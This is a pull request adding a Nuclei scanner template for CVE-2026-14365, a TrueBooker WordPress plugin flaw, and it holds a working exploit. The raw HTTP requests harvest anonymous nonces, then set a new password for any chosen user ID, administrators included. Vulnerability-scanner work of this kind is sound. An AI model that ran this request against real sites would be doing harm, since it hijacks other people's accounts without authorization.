### PR TITLE
Add CVE-2026-14365 TrueBooker WordPress account-update authorization bypass

### DIFF
--- a/http/cves/2026/CVE-2026-14365.yaml
+++ b/http/cves/2026/CVE-2026-14365.yaml
@@ -1,0 +1,92 @@
+id: CVE-2026-14365
+
+info:
+  name: TrueBooker – Appointment Booking and Scheduler System <= 1.2.3 - Unauthenticated Arbitrary Password Change
+  author: str4k3r
+  severity: critical
+  description: |
+    TrueBooker - Appointment Booking and Scheduler System for WordPress
+    through 1.2.3 registers its add_front_user_update_account AJAX handler
+    on both wp_ajax_ and wp_ajax_nopriv_, and derives the WordPress user ID
+    to update directly from the client-supplied truebooker_wp_user_id POST
+    field with no comparison against the caller's own identity. The
+    password_current check is skipped entirely whenever that field is left
+    empty, so an unauthenticated visitor who supplies a target's own email
+    address (to satisfy the plugin's email-collision check) can set an
+    arbitrary new password for that account, including an administrator,
+    via wp_set_password(). Version 1.2.4 requires the caller to be logged
+    in, enforces current_user_id === truebooker_wp_user_id (or
+    current_user_can('edit_user', ...)), and makes password_current
+    mandatory before any password change. This probe requires an
+    operator-provisioned disposable WordPress site with a public page
+    containing the [truebooker-myaccount] shortcode; it extracts the two
+    front-end nonces that page renders for anonymous visitors, then submits
+    the same unauthenticated password-change AJAX request the plugin itself
+    exposes. It uses only a randomized replacement password and does not
+    read, exfiltrate or reuse any account data beyond the plugin's own
+    JSON success flag.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-14365
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/afe10c10-cace-4ce4-a813-6fda04c8d3dd?source=cve
+    - https://plugins.trac.wordpress.org/browser/truebooker-appointment-booking/tags/1.2.3/main/function_ajax.php#L6252
+    - https://plugins.trac.wordpress.org/browser/truebooker-appointment-booking/tags/1.2.4/main/function_ajax.php#L6252
+    - https://plugins.trac.wordpress.org/changeset/3595807/truebooker-appointment-booking
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-14365
+    cwe-id: CWE-639
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: creativeitem
+    product: truebooker-appointment-booking
+    verified-vulnerable: "official WordPress.org package 1.2.3"
+    verified-fixed: "official WordPress.org package 1.2.4"
+  tags: cve,cve2026,wordpress,wp-plugin,truebooker,auth-bypass,unauth
+
+variables:
+  page_id: ""
+  target_wp_user_id: ""
+  target_email: ""
+  new_password: "Cve14365-{{rand_base(10)}}"
+
+http:
+  - raw:
+      - |
+        GET /?page_id={{page_id}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=add_front_user_update_account&security={{ajax_nonce}}&truebooker_meta_box_noncename={{mb_nonce}}&tbab-fname=Probe&tbab-lname=Probe&tbab-dname=Probe&tbab-email={{url_encode(target_email)}}&truebooker_user_id={{target_wp_user_id}}&truebooker_wp_user_id={{target_wp_user_id}}&password_1={{url_encode(new_password)}}&password_2={{url_encode(new_password)}}&truebooker_user_gender=male
+
+    extractors:
+      - type: regex
+        name: ajax_nonce
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"nonce":"([a-f0-9]+)"'
+      - type: regex
+        name: mb_nonce
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'name="truebooker_meta_box_noncename" value="([a-f0-9]+)"'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        part: status_code_2
+        status:
+          - 200
+      - type: word
+        part: body_2
+        words:
+          - '"passwordchange":1'


### PR DESCRIPTION
## Vulnerability
TrueBooker 1.2.3 exposes the account-update AJAX action to unauthenticated callers and trusts the client-supplied `truebooker_wp_user_id` without checking the current password. Version 1.2.4 binds the update to the authenticated account and verifies the password.

## Template behavior
The template loads the `[truebooker-myaccount]` page, extracts the required nonces, submits the account update for the selected user, and matches the success response indicating a password change.

## Required configuration
Set `page_id`, `target_wp_user_id`, and `target_email` for an authorized disposable WordPress account. `new_password` should be temporary; the test changes that account password on a vulnerable site.

## Impact
An unauthenticated attacker can change another WordPress user’s password and take over the account.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-14365.yaml -var page_id=<page-id> -var target_wp_user_id=<user-id> -var target_email=<user-email> -var new_password=<temporary-password>
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
